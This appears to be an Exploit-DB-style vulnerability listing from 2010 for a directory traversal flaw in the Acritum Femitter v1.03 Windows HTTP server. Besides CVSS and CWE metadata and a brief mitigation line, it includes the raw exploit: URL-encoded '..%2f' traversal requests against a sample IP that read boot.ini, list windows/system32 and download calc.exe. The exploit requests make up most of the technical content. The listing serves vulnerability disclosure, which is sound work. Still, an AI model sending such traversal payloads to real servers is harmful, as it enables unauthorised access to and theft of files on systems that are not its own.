header-logo
Suggest Exploit
vendor:
Femitter
by:
Dr_IDE
5.5
CVSS
MEDIUM
Directory Traversal
22
CWE
Product Name: Femitter
Affected Version From: 01.03
Affected Version To: 01.03
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 7
2010

Acritum Femitter v1.03 Directory Traversal Exploit

Acritum Femitter v1.03 is vulnerable to remote directory traversal attack.

Mitigation:

Apply the latest patch/update provided by the vendor.
Source

Exploit-DB raw data:

############################################################
#
# Acritum Femitter v1.03 Directory Traversal Exploit
# Found By:             Dr_IDE
# Date:                 Apr. 20, 2010
# Tested On:            Windows 7
# Download:             http://acritum.com/fem/download.htm
#
############################################################

- Description -

Acritum Femitter v1.03 is a Windows based HTTP server. This is the latest
version of the application available.

Acritum Femitter v1.03 is vulnerable to remote directory traversal attack by the
following means.

- Technical Details -
http://[webserver IP]/[\../]

http://172.16.2.102////..%2f..%2f..%2f..%2fboot.ini                                             <- File Access
http://172.16.2.102////..%2f..%2f..%2f..%2fwindows/system32                             <- Full Directory Listing
http://172.16.2.102////..%2f..%2f..%2f..%2fwindows/system32/calc.exe    <- File Download

#[pocoftheday.blogspot.com]